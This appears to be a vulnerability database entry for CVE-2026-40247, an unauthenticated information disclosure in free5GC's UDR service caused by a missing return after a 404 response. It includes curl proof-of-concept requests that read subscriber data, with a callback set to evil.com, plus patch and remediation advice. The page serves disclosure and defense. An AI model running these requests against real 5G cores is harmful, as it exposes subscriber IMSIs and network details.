CVE-2026-40247
HIGHSeverity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
6DescriptionGitHub Advisory
Summary
An improper path validation vulnerability in the UDR service allows any unauthenticated attacker with access to the 5G Service Based Interface (SBI) to read Traffic Influence Subscriptions by supplying an arbitrary value in place of the expected subs-to-notify path segment.
Details
The endpoint GET /nudr-dr/v2/application-data/influenceData/{influenceId}/{subscriptionId} is intended to only operate on Traffic Influence Subscription resources when influenceId is exactly subs-to-notify.
In the free5GC UDR implementation, the path validation is present but ineffective because the handler does not return after sending the HTTP 404 response. The request handling flow is:
- The function
HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdGetin./free5gc_4-2-1/free5gc/NFs/udr/internal/sbi/api_datarepository.gochecks whetherinfluenceId != "subs-to-notify". - If the value is different, it calls
c.String(http.StatusNotFound, "404 page not found"), but it does not return afterwards. - Execution continues and the handler still calls
s.Processor().ApplicationDataInfluenceDataSubsToNotifySubscriptionIdGetProcedure(c, subscriptionId). - The processor retrieves and returns the subscription identified by
subscriptionIdeven though the path is invalid and the request should have been rejected.
As a result, an attacker can send a request to an invalid path, receive an apparent 404 page not found response, and still obtain the full subscription object in the same HTTP response body.
The missing return after sending the 404 response in api_datarepository.go is the root cause of this vulnerability.
PoC
No authentication is required. Only a valid subscriptionId is needed.
# Create a subscription to obtain a valid subscriptionId
curl -v -X POST "http://<udr-host>/nudr-dr/v2/application-data/influenceData/subs-to-notify" \
-H "Content-Type: application/json" \
-d '{
"notificationUri":"http://evil.com/notify",
"dnns":["internet"],
"snssais":[{"sst":1,"sd":"000001"}],
"supis":["imsi-222777483957498"]
}'Example response:
HTTP/1.1 201 CreatedThen read it through an invalid path:
curl -v "http://<udr-host>/nudr-dr/v2/application-data/influenceData/WRONGID/87615e16"Response:
HTTP/1.1 404 Not Found
404 page not found{"dnns":["internet"],"snssais":[{"sst":1,"sd":"000001"}],"supis":["imsi-222777483957498"],"notificationUri":"http://evil.com/notify"}For comparison, the valid request is:
curl -v "http://<udr-host>/nudr-dr/v2/application-data/influenceData/subs-to-notify/87615e16"Response:
{"dnns":["internet"],"snssais":[{"sst":1,"sd":"000001"}],"supis":["imsi-222777483957498"],"notificationUri":"http://evil.com/notify"}Impact
This is an unauthenticated information disclosure vulnerability. Any attacker with network access to the SBI can retrieve Traffic Influence Subscription objects by knowing or guessing a valid subscriptionId, even when using an invalid path that should have been rejected.
The returned objects may contain sensitive subscriber-related information, including SUPIs/IMSIs, DNNs, S-NSSAIs, and callback notificationUri values.
Impacted deployments: any free5GC instance where the SBI is reachable by untrusted parties (e.g., misconfigured network segmentation, rogue NF, or compromised internal host).
Patch
The vulnerability has been confirmed patched by adding the missing return statement in NFs/udr/internal/sbi/api_datarepository.go, function HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdGet:
go
if influenceId != "subs-to-notify" {
c.String(http.StatusNotFound, "404 page not found")
return
}With the patch applied, requests using an invalid influenceId now correctly return HTTP 404 and do not disclose the targeted subscription data.
AnalysisAI
Unauthenticated information disclosure in free5GC UDR service allows remote attackers to retrieve sensitive Traffic Influence Subscription data through improper path validation. Due to a missing return statement after sending HTTP 404 responses, attackers can read subscription records containing subscriber IMSIs, network slice identifiers, and callback URIs without authentication by supplying arbitrary path values. EPSS score of 0.06% suggests low widespread exploitation probability, though the vulnerability requires only network access to the 5G Service Based Interface with no authentication or user interaction (CVSS:4.0 AV:N/AC:L/PR:N/UI:N). Publicly available exploit code exists in the original disclosure.
Technical ContextAI
The vulnerability affects free5GC's Unified Data Repository (UDR) Network Function, which implements 3GPP's User Data Repository service in 5G core networks. The UDR exposes a RESTful API over the Service Based Interface (SBI) for managing application data including Traffic Influence Subscriptions defined in TS 29.519. The affected endpoint follows the pattern /nudr-dr/v2/application-data/influenceData/{influenceId}/{subscriptionId} where influenceId should be validated as the literal string 'subs-to-notify' per 3GPP specifications. The root cause is CWE-285 (Improper Authorization) manifesting as a control flow error in the Golang handler function HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdGet. The code correctly identifies invalid paths and calls c.String(http.StatusNotFound) but fails to halt execution, allowing subsequent processor logic to retrieve and serialize the subscription object. This results in HTTP responses containing both the 404 status message and the confidential JSON payload in the same response body. The vulnerability exists in the github.com/free5gc/udr Go package and affects deployments where the SBI network is accessible to potential attackers, which violates 5G security architecture assumptions that the SBI operates within a trusted security domain.
RemediationAI
The vulnerability has been confirmed patched by the free5GC project. Update to the patched version of github.com/free5gc/udr that includes the corrected HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdGet function with the added return statement after the HTTP 404 response. The specific patch adds 'return' after 'c.String(http.StatusNotFound, "404 page not found")' in NFs/udr/internal/sbi/api_datarepository.go. Consult the GitHub Security Advisory at https://github.com/free5gc/free5gc/security/advisories/GHSA-x5r2-r74c-3w28 for the exact patched commit or release version. If immediate patching is not feasible, implement network-level compensating controls: restrict SBI access exclusively to authenticated and authorized Network Functions using mutual TLS authentication with certificate validation, implement IP allowlisting at firewall or service mesh level to permit only known NF addresses, deploy intrusion detection signatures to alert on requests with malformed influenceId path segments (anything other than 'subs-to-notify'), and enable comprehensive SBI audit logging to detect reconnaissance attempts via 404 responses with unusual response body sizes. Note that network segmentation alone is insufficient since the vulnerability enables lateral movement after initial compromise; authentication enforcement and monitoring are essential. For cloud-native deployments using Kubernetes, apply Network Policies restricting ingress to the UDR pod exclusively from authorized NF namespaces/selectors. Review existing Traffic Influence Subscriptions for unauthorized access patterns in logs prior to patching, as historical exploitation may have occurred undetected.
Same weakness CWE-285 – Improper Authorization
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-x5r2-r74c-3w28